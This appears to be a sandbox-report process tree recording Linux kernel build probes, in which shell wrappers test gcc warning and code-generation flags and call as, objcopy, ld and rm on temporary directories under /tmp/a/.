/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1717/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cceaQCo1.s5⤵
- Writes file to tmp directory
PID:1720
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1717/tmp /tmp/cceaQCo1.s5⤵PID:1721
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1717/tmp /tmp/cceaQCo1.s5⤵PID:1721
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1717/tmp /tmp/cceaQCo1.s5⤵PID:1721
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1717/tmp /tmp/cceaQCo1.s5⤵
- Writes file to tmp directory
PID:1721
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17174⤵PID:1722
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( /bin/echo -e '1: .quad 1b' | gcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o \"\$TMP\" - && objcopy -O elf32-x86-64 \"\$TMP\" \"\$TMP.o\" && ld -m elf32_x86_64 \"\$TMP.o\" -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1723
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17234⤵PID:1724
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o /tmp/a/.tmp_1723/tmp -4⤵PID:1727
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1723/tmp -5⤵PID:1728
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1723/tmp -5⤵PID:1728
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1723/tmp -5⤵PID:1728
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1723/tmp -5⤵
- Writes file to tmp directory
PID:1728
-
-
-
/bin/echo/bin/echo -e "1: .quad 1b"4⤵PID:1726
-
-
/usr/bin/objcopyobjcopy -O elf32-x86-64 /tmp/a/.tmp_1723/tmp /tmp/a/.tmp_1723/tmp.o4⤵
- Writes file to tmp directory
PID:1729
-
-
/usr/bin/ldld -m elf32_x86_64 /tmp/a/.tmp_1723/tmp.o -o /tmp/a/.tmp_1723/tmp4⤵
- Writes file to tmp directory
PID:1725
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17234⤵PID:1730
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-frame-address\"; else echo \"\"; fi"3⤵PID:1731
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17314⤵PID:1732
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o /tmp/a/.tmp_1731/tmp4⤵
- Writes file to tmp directory
PID:1733 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1731/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wframe-address "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccuLOwa6.s5⤵PID:1734
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1731/tmp /tmp/ccuLOwa6.s5⤵PID:1735
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1731/tmp /tmp/ccuLOwa6.s5⤵PID:1735
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1731/tmp /tmp/ccuLOwa6.s5⤵PID:1735
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1731/tmp /tmp/ccuLOwa6.s5⤵PID:1735
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17314⤵PID:1736
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-truncation\"; else echo \"\"; fi"3⤵PID:1737
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17374⤵PID:1738
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o /tmp/a/.tmp_1737/tmp4⤵PID:1739
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1737/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccZjViGM.s5⤵
- Writes file to tmp directory
PID:1740
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1737/tmp /tmp/ccZjViGM.s5⤵PID:1741
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1737/tmp /tmp/ccZjViGM.s5⤵PID:1741
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1737/tmp /tmp/ccZjViGM.s5⤵PID:1741
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1737/tmp /tmp/ccZjViGM.s5⤵
- Writes file to tmp directory
PID:1741
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17374⤵PID:1742
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-overflow\"; else echo \"\"; fi"3⤵PID:1743
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17434⤵PID:1744
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o /tmp/a/.tmp_1743/tmp4⤵PID:1745
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1743/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccIQz2v0.s5⤵
- Writes file to tmp directory
PID:1746
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1743/tmp /tmp/ccIQz2v0.s5⤵PID:1747
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1743/tmp /tmp/ccIQz2v0.s5⤵PID:1747
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1743/tmp /tmp/ccIQz2v0.s5⤵PID:1747
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1743/tmp /tmp/ccIQz2v0.s5⤵
- Writes file to tmp directory
PID:1747
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17434⤵PID:1748
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵PID:1749
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17494⤵PID:1750
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1749/tmp4⤵PID:1751
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1749/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Waddress-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/cc2XHSRf.s5⤵
- Writes file to tmp directory
PID:1752
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/cc2XHSRf.s5⤵PID:1753
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/cc2XHSRf.s5⤵PID:1753
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/cc2XHSRf.s5⤵PID:1753
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/cc2XHSRf.s5⤵
- Writes file to tmp directory
PID:1753
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17494⤵PID:1754
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"--param=allow-store-data-races=0\"; else echo \"\"; fi"3⤵PID:1755
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17554⤵PID:1756
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" -c -x c /dev/null -o /tmp/a/.tmp_1755/tmp4⤵PID:1757
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17554⤵PID:1758
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-allow-store-data-races\"; else echo \"\"; fi"3⤵PID:1759
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17594⤵PID:1760
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -c -x c /dev/null -o /tmp/a/.tmp_1759/tmp4⤵PID:1761
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1759/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-clash-protection -o /tmp/cc1n3epJ.s5⤵PID:1762
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1759/tmp /tmp/cc1n3epJ.s5⤵PID:1763
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1759/tmp /tmp/cc1n3epJ.s5⤵PID:1763
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1759/tmp /tmp/cc1n3epJ.s5⤵PID:1763
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1759/tmp /tmp/cc1n3epJ.s5⤵PID:1763
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17594⤵PID:1764
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wimplicit-fallthrough=5\"; else echo \"\"; fi"3⤵PID:1765
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17654⤵PID:1766
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -c -x c /dev/null -o /tmp/a/.tmp_1765/tmp4⤵PID:1767
-
